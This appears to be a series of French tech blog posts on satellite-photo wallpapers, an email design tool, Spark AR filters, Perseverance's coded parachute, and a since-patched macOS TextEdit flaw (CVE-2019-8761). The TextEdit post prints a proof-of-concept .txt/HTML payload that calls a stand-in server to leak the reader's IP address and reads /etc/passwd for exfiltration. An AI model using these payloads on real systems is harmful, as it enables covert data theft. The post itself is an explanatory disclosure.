En France, on a mieux que des satellites géostationnaires. On a Thomas Pesquet avec son Reflex ! La classe non ? Bon, ce cher Tom Astro repart bientôt dans l’ISS en tant que Commandeur Suprême de la Force Terrienne Intergalactique et en attendant de vous gaver sur son compte Instagram, je vous invite à tester ces différents sites et outils pour récupérer des photos satellites fraîches et les utiliser par exemple comme wallpaper.

Sommaire :

• Space Eye
• Live Orbital Wallpapers
• Sentinel Hub
• NASA
• Google Earth Engine

Space Eye

Conçu pour Mac et Windows, SpaceEye se loge dans la barre de notifs et vous permet de profiter d’une photo satellite en fond d’écran qui est mise à jour en temps réel. Pour les Linux, il est également possible de le compiler sur votre OS, mais ce sera plus barbu.

Issue des satellites météorologiques Meteosat, NOAA et d’autres, auxquels vous pouvez même avoir accès en direct avec une simple clé SDR, ces photos haute résolution seront du plus bel effet sur votre ordinateur.

Space Eye est dispo ici.

Live Orbital Wallpapers

Dispo sur le store de Microsoft, cette application vous affichage également des photos de la Terre en temps réel soit en fon d’écran, soit sur votre écran de login

Sentinel Hub

L’application en ligne Sentinel Hub vous permet d’avoir accès aux dernières photos satellites. Vous pouvez changer de satellite, de coloration (normal, infrarouge…etc.), trouver des photos récentes avec plus ou moins de nuages et si vous cliquez sur le bouton GENERATE, vous obtiendrez une jolie image JPG à mettre en fond d’écran.

Les photos de la NASA

La NASA publie également des photos et des galeries des différentes missions, découvertes et satellites. Y’a de quoi faire et les images sont de très bonne qualité. Et vous pouvez même utiliser ce script pour automatiser l’affichage en fond d’écran.

Google Earth Engine

Maintenant si rien ne vous plait et que vous voulez développer votre propre script de récupération de photos satellites, il y a Google Earth Engine qui propose l’accès via des API à des jeux de données de photos satellites. Il faudra bien sûr s’inscrire chez Google et faire un peu de code, mais après vous pourrez récupérer des tas de photos pour la plupart techniques (c’est principalement utilisé pour faire de la science), mais également jolies et de bonne qualité.

Merci à Doant pour son aide. Et si vous avez d’autres ressources qui méritent de figurer dans cette liste, n’hésitez pas à me le dire dans les commentaires.

Vous allez être surpris (ou pas), mais une majorité de personnes qui bossent dans la tech ou qui utilisent Internet dans un cadre professionnels ne sont pas des techniciens. Ils n’ont pas de notions de développement, encore moins en réseau et je ne vous parle pas de la sécurité.

C’est normal et cela ne les empêche pas de faire correctement leur boulot, surtout que les informaticiens sont là pour leur simplifier la vie. J’avais par exemple déjà parlé de Postal qui permet de gérer ses envois d’emails marketing sans dépendre d’une société tierce.

Prenons par exemple un Community Manager qui doit envoyer des emails à des clients… ça parait simple d’envoyer un mailing, mais en vrai non. Il faut bien sûr bosser le titre et le contenu, ne pas faire d’erreurs, bien choisir l’heure et le jour d’envoi, mais également proposer un email joli graphiquement, responsive et qui charge rapidement. Pas simple.

Tout cela peut s’apprendre sur le tas, mais il existe également des outils qui vous simplifieront la vie. Aujourd’hui, je vais donc vous présenter Mail Studio, un éditeur de mail qui vous permettra de concevoir des emails lisibles sur tous les appareils et au design agréable, le tout sans avoir besoin de compétences techniques ou en graphisme.

À l’aide de l’éditeur visuel, simplement en glissant déposant des photos et des objets comme des boutons d’action…etc vous pourrez structurer vos e-mails sans écrire une ligne de code et visualiser le rendu aussi bien sur smartphone que sur ordinateur très simplement. Mail Studio contient d’ailleurs une grosse bibliothèque de composants de titres, de styles de paragraphes, mais également des composants dynamiques comme des barres de navigation.

Vous pouvez même créer vos propres objets pour les réutiliser ensuite dans vos projets. Sans oublier une grosse collection de polices (Google Fonts) et d’icônes SVG que vous pouvez intégrer et personnaliser. Notez que ces SVG sont convertis automatiquement en PNG lors de l’export pour que cela soit compatible avec tous les clients email.

Au lancement de l’application, différents modèles d’emails vous sont également proposés, ce qui vous permet d’aller vite en modifiant un template existant. Impossible de vous tromper comme ça. Évidement, tous ces modèles sont compatibles avec les clients mails les plus connus comme Mail d’iOS, Outlook, Thunderbird et j’en passe… Et la conception du mail est responsive by design, c’est-à-dire que l’email s’affichera correctement sur tous les écrans.

Après si vous voulez aller plus loin, vous pouvez également éditer directement l’HTML ou le CSS avec l’éditeur de code avancé qui gère l’autocomplétion, les variables CSS, le SASS…etc.

Mail Studio est dispo en version gratuite, mais si vous voulez plus d’options comme la sauvegarde dans le cloud, la prévisualisation, l’export vers Mailchimp (et compagnie) ou la possibilité de créer un modèle exportable, il faudra payer un petit abonnement.

Mail Studio est téléchargeable ici pour Windows et macOS.

Il y a parfois des concepts fondamentaux qui sont bien remis en question par les hackers ! Et heureusement !

Prenons par exemple un fichier .TXT… Quoi de plus innocent que ce format texte ? D’ailleurs, c’est tellement safe que certains antivirus ou firewalls ne le considèrent même pas comme une menace potentielle. Même Gatekeeper qui est le système de quarantaine de macOS ne s’y intéresse pas, même si vous avez téléchargé le fichier à partir d’un site douteux.

Seulement voilà, c’était sans compter sur Paulos Yibelo, un hacker qui a trouvé le moyen de faire fuiter de la donnée locale vers l’extérieur à partir d’un simple fichier texte. La faute de TextEdit sous macOS qui pour une raison obscure interprète les fichiers .TXT qui contiennent du HTML ou du RTF. Donc si vous avez un fichier.txt qui contient du HTML, il l’ouvrira comme une page web avec la mise en page et tout et tout.

C’est donc une bonne opportunité pour un attaquant qui peut alors faire interpréter du HTML et de la CSS dans TextEdit en envoyant un .txt à sa victime.

Oui mais ?

Alors déjà, en procédant ainsi, il contourne comme je le disais la sécurité GateKeeper de macOS. Ensuite, en utilisant les modèles HTTPLeaks proposés par Cure53, il a trouvé un moyen d’appeler un fichier tiers dans ce HTML.

Pour cela, il a utilisé la balise HTML qu’on utilise le plus souvent pour importer des feuilles de style (CSS) :

<style> @import {"url"} </style>

Sauf que vous vous en doutez, il est possible d’importer uniquement des fichiers locaux, dont l’URL commence par file:/// (http(s):// ne fonctionne pas).

Déjà rien qu’avec ça, il peut provoquer un DoS (déni de service) sur la machine en incluant un flux de données infini comme /dev/urandom ou /dev/zero. Mais Paulos a cherché à aller plus loin et a utiliser la fonction AutoMount qui permet d’appeler des fichiers distants avec file:///.

Si vous faites une requête vers file:///net/korben.info, et bien, ça ira taper sur mon site avec une bonne vieille requête TCP. Merci AutoMount !! 😉

Il a donc concocté un fichier texte contenant le code suivant qui appelle donc le fichier a.css sur un serveur distant :

<!DOCTYPE HTML>
<html><head></head><body><style>@import{ "file:///net/MYSERVER.COM/a.css"} </style>
I know where you are...</body></html>

Et ça passe puisque lui de son côté, peut récupérer l’IP de la personne qui a ouvert le document .txt à partir des requêtes effectuées :

Un autre truc sympa avec le HTML, c’est la balise <framedoc/> qui permet d’injecter dans une page HTML le contenu d’un fichier tiers. On peut par exemple afficher le contenu du fichier /etc/passwd ou le /etc/shadow comme ceci :

<iframedoc src="file:///etc/passwd">

Sympa non ? À partir de ces deux éléments, <framedoc/> et <style/>, il devient alors possible de faire fuiter des données, en les passant par exemple en paramètre des URLs distantes appelées.

Et voilà comment à partir d’une application qui normalement est 100% offline, on peut réussir à faire sortir de la donnée à l’insu de quelqu’un à l’aide d’un fichier totalement innocent comme le .txt

Apple a été informé de cette faille en 2019 et elle a été corrigée en 2020. Vous la trouverez sous le code CVE-2019-8761.

Avec les nouveaux réseaux sociaux à base de vidéo comme Instagram ou TikTok, vous avez sans doute remarqué qu’il était possible d’ajouter des filtres sur votre visage boursouflé, ou incruster des objets 3D dans votre environnement.

Il y a beaucoup de filtres amusants, qui permettent d’ajouter un peu de fun dans ses stories, mais certaines marques s’amusent également à créer des filtres pour certaines de leurs opérations marketing. Et créer des filtres, c’est même devenu un job pour certains qui font de véritables œuvres d’arts pour le compte de sociétés qui veulent proposer un truc cool à leurs clients sur Instagram par exemple.

Ça peut paraître compliqué de prime abord, mais Facebook qui édite également Instagram, a pensé à tout puisqu’ils proposent un outil baptisé Spark AR qui permet de créer ses propres filtres. Il vous faudra un compte Facebook pour profiter de cette application et vous pourrez uniquement soumettre vos filtres à Facebook ou Instagram. Donc c’est mort, en tout cas avec ce soft, pour faire un filtre Tiktok ou Snapchat.

Une fois installé, l’outil vous propose soit de partir sur un modèle, soit de partir de zéro. Pas forcément besoin de savoir coder, ni de faire de la 3D. Vous pouvez jouer avec les paramètres de certains de ces filtres pour faire le vôtre. Mais évidemment, si vous importez des objets 3D ou un peu de code de votre conception, vous allez pouvoir faire des trucs de fou.

Il y a d’ailleurs plein de tutos dans l’application :

Je me suis un peu amusé avec et le rendu est très impressionnant. Là c’est moi en extra-terrestre des enfers :

Ou ici avec mon meilleur ami, dans le meilleur resto clando de la capitale :

Vous pouvez donc jouer avec les visages, avec des objets 3D, intégrer des logos, modifier les voix, changer la couleur des yeux et des cheveux, modifier le fond, appliquer un filtre par-dessus la vidéo…etc. Ou inventer quelque chose de nouveau, mais il faudra mettre un peu plus les mains dans le cambouis.

Une fois votre filtre créé, vient ensuite le moment de le publier sur la plateforme. Vous devrez entrer une description, faire une vidéo démo…etc. et vous devrez attendre que Facebook le valide. Je croise les doigts pour vous 🙂

Amusez-vous bien !

Si vous vous intéressez à l’espace et à la science, vous avez forcément suivi l’arrivée du robot Perseverance à la surface de Mars le 18 février 2021. Percy de son petit nom (comme mon chat), ce robot de la NASA doit aider les scientifiques à déterminer si la vie s’est développée sur la planète rouge.

Pour cela, Perseverance va d’abord explorer son site d’atterrissage situé dans l’hémisphère nord de Mars, proche de l’équateur, plus exactement dans le cratère Jezero. Ce cratère de 49 km de dimension a été choisi par la NASA, car il aurait contenu de l’eau il y a plusieurs milliards d’années.

Percy va ensuite chercher des indices indiquant que la vie a été présente à cet endroit. Et collecter des échantillons qui seront ensuite récupérés lors d’une mission future. Au-delà de sa recherche de vie extraterrestre, le rover va en profiter pour défricher scientifiquement le terrain pour l’arrivée future d’astronautes à la surface de Mars. Impact des poussières martiennes sur l’exploration humaine, caractéristiques du climat, atmosphère…etc.

Un truc que j’ai adoré avec Perseverance, c’est surtout son arrivée rock’n’roll sur Mars… Ce n’était pas simple, mais ça s’est vraiment bien passé. En gros, Percy est entré dans l’atmosphère protégée par son bouclier thermique. Il a ensuite éjecté ce bouclier et sorti son parachute, puis le drone attaché au rover a enclenché les rétropropulseurs avant de descendre le rover à l’aide d’un treuil.

Je vous mets la vidéo, c’est ouf, vous allez voir. C’est tellement beau que ça m’en fait des frissons. Si vous ne ressentez rien en regardant cette vidéo, bah j’ai sincèrement mal au cœur pour vous :-))

Vous avez vu le parachute ? Il est beau non ? Et bien cela a interpelé certains space-geeks qui ont rapidement compris que les ingénieurs de la NASA avaient planqué un message codé dans le parachute.

En gros quand c’est blanc, c’est 0 et quand c’est orange, c’est 1… Vous l’aurez compris, il s’agit d’un message en binaire. C’est d’ailleurs un étudiant français qui a décodé le premier le message : DARE MIGHTY THINGS qu’on pourrait traduire par « Osez de grandes choses ! ». Je vous invite à cliquer ici pour comprendre comment procéder au décodage.

Amusant non ?

Maintenant si vous voulez reprendre ce principe pour transmettre vous aussi des messages codés sous la forme de parachutes de la NASA, une seule adresse : Msg2Mars.

Ce service développé par Samuel Warner permet de réaliser l’opération très facilement. Vous entrez 3 mots clés et des coordonnées et vous pouvez enregistrer votre petit parachute sur votre disque dur.

J’espère que les extraterrestres de passage se sentiront inspirés par ce message 🙂

Puis si vous voulez imprimer en 3D votre propre rover Martien, j’ai une astuce pour ça !